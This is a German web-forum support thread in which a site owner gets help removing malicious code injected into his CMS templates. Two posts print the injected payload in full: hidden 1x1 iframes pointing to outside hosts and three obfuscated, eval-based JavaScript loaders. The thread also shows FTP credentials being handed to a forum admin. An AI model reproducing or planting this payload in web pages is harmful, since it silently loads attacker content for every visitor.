  11. #11
    User Pic
    Lord|Schirmer Administrator
    Registriert seit
    21.03.2007
    Beiträge
    7.638
    Beitragswertungen
    1193 Beitragspunkte
    Wenn Du es wirklich nicht findest, sende mir mal, sofern Du möchtest, die FTP Zugangsdaten zu und ich schau es mir mal an!
    rules :: doku :: faq :: linkus
    0 Mitglieder finden den Beitrag gut.
  12. #12
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    das wäre Super von Dir.
    Kennen uns zwar nicht aber als Admins vertraue ich Dir lächeln
    Sende Sie dir per PM zu.
    Bin gespannt wo dieser Code nun liegt.

    LG.Andi
    0 Mitglieder finden den Beitrag gut.
  13. #13
    User Pic
    Lord|Schirmer Administrator
    Registriert seit
    21.03.2007
    Beiträge
    7.638
    Beitragswertungen
    1193 Beitragspunkte
    Problem gelöst!

    Schadcode in HP/include/admin/templates/index.htm, welcher aufgrund verschachteler Doppelinstallation nicht gleich gefunden werden konnte.

    Ändere bitte noch die Passwörter (FTP/Datenbank)!
    Unbedingt gem. dieser Angabe noch die Chmods anpassen!

    PS: Habe Dir schnell noch die notwendigsten Rechte angepasst, da viele Dateien 777 (incl. der config) hatten!


    Zuletzt modifiziert von Lord|Schirmer am 23.12.2011 - 22:26:32
    rules :: doku :: faq :: linkus
    0 Mitglieder finden den Beitrag gut.
  14. #14
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Danke Dir LordSchirmer für die Hilfe:)
    Auch Danke an Mairu.

    Sowas gibt es nicht oft das so schnell geholfen wird in einem Forum.
    Wünsche Euch ein Frohes Fest heute Abend.
    Dank Eurer Hilfe habe ich das "größte" Problem gelöst und kann in Ruhe Feiern mit den Kindern:P

    LG.Andreas
    0 Mitglieder finden den Beitrag gut.
  15. #15
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    es wurde noch so ein Schade Code entdeckt durch zufall.
    habe ein falsches PW eingegeben da ist es aufgetaucht.
    Welche PHP ist das?
    0 Mitglieder finden den Beitrag gut.
  16. #16
    User Pic
    Forcey Mitglied
    Registriert seit
    19.09.2010
    Beiträge
    411
    Beitragswertungen
    66 Beitragspunkte
    klingt nach login.htm, include/templates/user
    1 Mitglieder finden den Beitrag gut.
  17. #17
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Danke für die schnelle Info.
    Sobald ich wieder sn den Laptop kann (mit Serverzugang) melde ich mich wieder.

    Gruß Andi
    0 Mitglieder finden den Beitrag gut.
  18. #18
    User Pic
    T3BAss Mitglied
    Registriert seit
    21.12.2011
    Beiträge
    133
    Beitragswertungen
    18 Beitragspunkte
    Das gehört glaube ich nicht in den Code oder?

    <iframe src="http://selen77.com/" width="1" height="1" frameborder="0"></iframe><script language="javascript" type="text/javascript">var O01='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PvUncuQ3YlJXakVWbpR3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var l0O=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function I0O(OII){var _1lO=l0O[0];var l10,I1I,_10O,l1O,O11,_1l0,_1ll,_110,IIO=0,_0Ol=l0O[1];do{l1O=_1lO[l0O[3]](OII[l0O[2]](IIO++));O11=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1l0=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1ll=_1lO[l0O[3]](OII[l0O[2]](IIO++));_110=l1O<<18|O11<<12|_1l0<<6|_1ll;l10=_110>>16&0xff;I1I=_110>>8&0xff;_10O=_110&0xff;if(_1l0==64){_0Ol+=String[l0O[4]](l10);}else{if(_1ll==64){_0Ol+=String[l0O[4]](l10,I1I);}else{_0Ol+=String[l0O[4]](l10,I1I,_10O);};};} while(IIO<OII[l0O[5]]);return _0Ol;};function OIl(IO0){var OlO=l0O[1],IIO=0;for(IIO=IO0[l0O[5]]-1;IIO>=0;IIO--){OlO+=IO0[l0O[2]](IIO);};return OlO;};eval(I0O(OIl(O01)));</script>
    <script language="javascript" type="text/javascript">var IOO='=sTKn4Ddwl2JrcicjN3L84jI3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var OII=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function O01(l1I){var lO1=OII[0];var I00,_0OI,OI1,OI0,I1I,l10,III,_010,O11=0,IOl=OII[1];do{OI0=lO1[OII[3]](l1I[OII[2]](O11++));I1I=lO1[OII[3]](l1I[OII[2]](O11++));l10=lO1[OII[3]](l1I[OII[2]](O11++));III=lO1[OII[3]](l1I[OII[2]](O11++));_010=OI0<<18|I1I<<12|l10<<6|III;I00=_010>>16&0xff;_0OI=_010>>8&0xff;OI1=_010&0xff;if(l10==64){IOl+=String[OII[4]](I00);}else{if(III==64){IOl+=String[OII[4]](I00,_0OI);}else{IOl+=String[OII[4]](I00,_0OI,OI1);};};} while(O11<l1I[OII[5]]);return IOl;};function IlO(OIO){var lIl=OII[1],O11=0;for(O11=OIO[OII[5]]-1;O11>=0;O11--){lIl+=OIO[OII[2]](O11);};return lIl;};eval(O01(IlO(IOO)));</script>
    <script language="javascript" type="text/javascript">var lO1='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IOI=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function _01O(_111){var _0l0=IOI[0];var _10l,I0O,_1IO,_1I0,OOI,Oll,l00,llO,O11=0,_1l0=IOI[1];do{_1I0=_0l0[IOI[3]](_111[IOI[2]](O11++));OOI=_0l0[IOI[3]](_111[IOI[2]](O11++));Oll=_0l0[IOI[3]](_111[IOI[2]](O11++));l00=_0l0[IOI[3]](_111[IOI[2]](O11++));llO=_1I0<<18|OOI<<12|Oll<<6|l00;_10l=llO>>16&0xff;I0O=llO>>8&0xff;_1IO=llO&0xff;if(Oll==64){_1l0+=String[IOI[4]](_10l);}else{if(l00==64){_1l0+=String[IOI[4]](_10l,I0O);}else{_1l0+=String[IOI[4]](_10l,I0O,_1IO);};};} while(O11<_111[IOI[5]]);return _1l0;};function _1Ol(O1l){var OlO=IOI[1],O11=0;for(O11=O1l[IOI[5]]-1;O11>=0;O11--){OlO+=O1l[IOI[2]](O11);};return OlO;};eval(_01O(_1Ol(lO1)));</script><iframe src="http://xtcstats.in/" width="1" height="1" frameborder="0"></iframe>


    Steht ganz unten, wurde also wahrscheinlich über die design klasse dort angefügt.

    schau mal in die include/contents/user/login.php und poste die hier
    1 Mitglieder finden den Beitrag gut.
  19. #19
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    GENAU das ist der Code.
    Haben den schon auf dem Server insg. gefühlte 80 msl gelöscht.
    War auch lange Ruhe bzw. jetzt durch zufall gesehen das einer überlebt hat lächeln
    Ja melde mich wieder
    0 Mitglieder finden den Beitrag gut.
  20. #20
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    komme leider noch nicht an den rechner.
    hier am handy habe ich den code auch unter der regestrierung gesehen -.-
    hier meine seite www.1sta.de/Hp
    0 Mitglieder finden den Beitrag gut.
  21. #21
    User Pic
    Forcey Mitglied
    Registriert seit
    19.09.2010
    Beiträge
    411
    Beitragswertungen
    66 Beitragspunkte
    Ich werd mal sicherheitshalber deine links vermeiden^^
    0 Mitglieder finden den Beitrag gut.
  22. #22
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    ne ist nur ein werbebanner zu sehen auf russisch.
    diesen nicht anklicken denn der leitet auf porno seiten um :))
    0 Mitglieder finden den Beitrag gut.
  23. #23
    User Pic
    Forcey Mitglied
    Registriert seit
    19.09.2010
    Beiträge
    411
    Beitragswertungen
    66 Beitragspunkte
    naja, wenn der javascript code iwas im .load der seite macht :p
    0 Mitglieder finden den Beitrag gut.
  24. #24
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    ZitatZitat geschrieben von Forcey

    klingt nach login.htm, include/templates/user


    Hallo,

    da habe ich nichts gefunden

    <table width="100%" border="0" cellspacing="0" cellpadding="10">
      <tr>
        <td>
          <form action="index.php?user-login" method="POST">
    			  <fieldset>
    				  <legend><b>{_lang_LOGIN}</b></legend>
    					  <label style="float:left; width:60px;">{_lang_nickname}</label><b style="float:left; text-align:left; width:20px;">:</b><input type="text" style="margin-bottom:2px;" tabindex="1" name="name" maxlength="15" /><br />
                <label style="float:left; width:60px;">{_lang_password}</label><b style="float:left; text-align:left; width:20px;">:</b><input type="password" style="margin-bottom:2px;" tabindex="2" maxlength="20" name="pass" /><br />
    						<label style="float:left; width:80px;">&nbsp;</label><input type="hidden" name="wdlink" value="{WDLINK}" /><input type="submit" style="margin-bottom:2px;" tabindex="3" value="{_lang_login}" name="user_login_sub" /><br /><br />
    						<label style="padding-left:80px;"><a href="index.php?user-regist">{_lang_registernow}</a></label><br />
    						<label style="padding-left:80px;"><a href="index.php?user-remind">{_lang_forgottenpassword}?</a></label>
          </form>
        </td>
      </tr>
    </table>
    
    
    {EXPLODE}
    {_lang_yourareloged}!
    {EXPLODE}
    
    {_lang_login3failure}<html><body></body></html>
    0 Mitglieder finden den Beitrag gut.
  25. #25
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    ZitatZitat geschrieben von T3BAss

    Das gehört glaube ich nicht in den Code oder?

    <iframe src="http://selen77.com/" width="1" height="1" frameborder="0"></iframe><script language="javascript" type="text/javascript">var O01='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PvUncuQ3YlJXakVWbpR3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var l0O=["x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D","","x63x68x61x72x41x74","x69x6Ex64x65x78x4Fx66","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x6Cx65x6Ex67x74x68"];function I0O(OII){var _1lO=l0O[0];var l10,I1I,_10O,l1O,O11,_1l0,_1ll,_110,IIO=0,_0Ol=l0O[1];do{l1O=_1lO[l0O[3]](OII[l0O[2]](IIO++));O11=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1l0=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1ll=_1lO[l0O[3]](OII[l0O[2]](IIO++));_110=l1O<<18|O11<<12|_1l0<<6|_1ll;l10=_110>>16&0xff;I1I=_110>>8&0xff;_10O=_110&0xff;if(_1l0==64){_0Ol+=String[l0O[4]](l10);}else{if(_1ll==64){_0Ol+=String[l0O[4]](l10,I1I);}else{_0Ol+=String[l0O[4]](l10,I1I,_10O);};};} while(IIO<OII[l0O[5]]);return _0Ol;};function OIl(IO0){var OlO=l0O[1],IIO=0;for(IIO=IO0[l0O[5]]-1;IIO>=0;IIO--){OlO+=IO0[l0O[2]](IIO);};return OlO;};eval(I0O(OIl(O01)));</script>
    <script language="javascript" type="text/javascript">var IOO='=sTKn4Ddwl2JrcicjN3L84jI3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var OII=["x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D","","x63x68x61x72x41x74","x69x6Ex64x65x78x4Fx66","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x6Cx65x6Ex67x74x68"];function O01(l1I){var lO1=OII[0];var I00,_0OI,OI1,OI0,I1I,l10,III,_010,O11=0,IOl=OII[1];do{OI0=lO1[OII[3]](l1I[OII[2]](O11++));I1I=lO1[OII[3]](l1I[OII[2]](O11++));l10=lO1[OII[3]](l1I[OII[2]](O11++));III=lO1[OII[3]](l1I[OII[2]](O11++));_010=OI0<<18|I1I<<12|l10<<6|III;I00=_010>>16&0xff;_0OI=_010>>8&0xff;OI1=_010&0xff;if(l10==64){IOl+=String[OII[4]](I00);}else{if(III==64){IOl+=String[OII[4]](I00,_0OI);}else{IOl+=String[OII[4]](I00,_0OI,OI1);};};} while(O11<l1I[OII[5]]);return IOl;};function IlO(OIO){var lIl=OII[1],O11=0;for(O11=OIO[OII[5]]-1;O11>=0;O11--){lIl+=OIO[OII[2]](O11);};return lIl;};eval(O01(IlO(IOO)));</script>
    <script language="javascript" type="text/javascript">var lO1='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IOI=["x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D","","x63x68x61x72x41x74","x69x6Ex64x65x78x4Fx66","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x6Cx65x6Ex67x74x68"];function _01O(_111){var _0l0=IOI[0];var _10l,I0O,_1IO,_1I0,OOI,Oll,l00,llO,O11=0,_1l0=IOI[1];do{_1I0=_0l0[IOI[3]](_111[IOI[2]](O11++));OOI=_0l0[IOI[3]](_111[IOI[2]](O11++));Oll=_0l0[IOI[3]](_111[IOI[2]](O11++));l00=_0l0[IOI[3]](_111[IOI[2]](O11++));llO=_1I0<<18|OOI<<12|Oll<<6|l00;_10l=llO>>16&0xff;I0O=llO>>8&0xff;_1IO=llO&0xff;if(Oll==64){_1l0+=String[IOI[4]](_10l);}else{if(l00==64){_1l0+=String[IOI[4]](_10l,I0O);}else{_1l0+=String[IOI[4]](_10l,I0O,_1IO);};};} while(O11<_111[IOI[5]]);return _1l0;};function _1Ol(O1l){var OlO=IOI[1],O11=0;for(O11=O1l[IOI[5]]-1;O11>=0;O11--){OlO+=O1l[IOI[2]](O11);};return OlO;};eval(_01O(_1Ol(lO1)));</script><iframe src="http://xtcstats.in/" width="1" height="1" frameborder="0"></iframe>


    Steht ganz unten, wurde also wahrscheinlich über die design klasse dort angefügt.

    schau mal in die include/contents/user/login.php und poste die hier


    Treffer das war er lächeln
    Hatte ich übersehen.
    Danke Euch!

    Gibt es eigentlich ein Programm das meine Server Dateien auf Viren oder Stichwörter durchsucht z.b wie in diesem Fall die Adresse selen777.com wo der Virus hinführte?
    0 Mitglieder finden den Beitrag gut.
  26. #26
    User Pic
    T3BAss Mitglied
    Registriert seit
    21.12.2011
    Beiträge
    133
    Beitragswertungen
    18 Beitragspunkte
    Auf jeden Fall gibt es da was ganz tolles: Sichere Passwörter, sichere ( geprüfte ) Skripte und einen professionellen Hoster, mit sicheren Servern.
    Wenn du das hast, wirst du zu 99,9% nie wieder solch Probleme haben.
    1 Mitglieder finden den Beitrag gut.
  27. #27
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    hatte noch nie Probleme.
    Gut vor kurzen den Hoster gewechselt zu All-Inkl. und mein Sohn hatte zusätzlich Wordpress auf dem Server install. und damit glaube hat alles angefangen mit einem Addon.
    Sage ich jetzt mal^^

    Habe auch damals (s.h erste Beiträge) ALLE Passwörter gewechselt.
    Sollte nun passen?

    Muß auch VBulletin mein Forum neu aufsetzen da es nicht mehr richtig läuft seit der Attacke, und die Fehlersuche mit hohen kosten verbunden ist -.-
    Durch das neu aufsetzen sollte nun alles sauber sein.
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Fehlersuche und Probleme

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten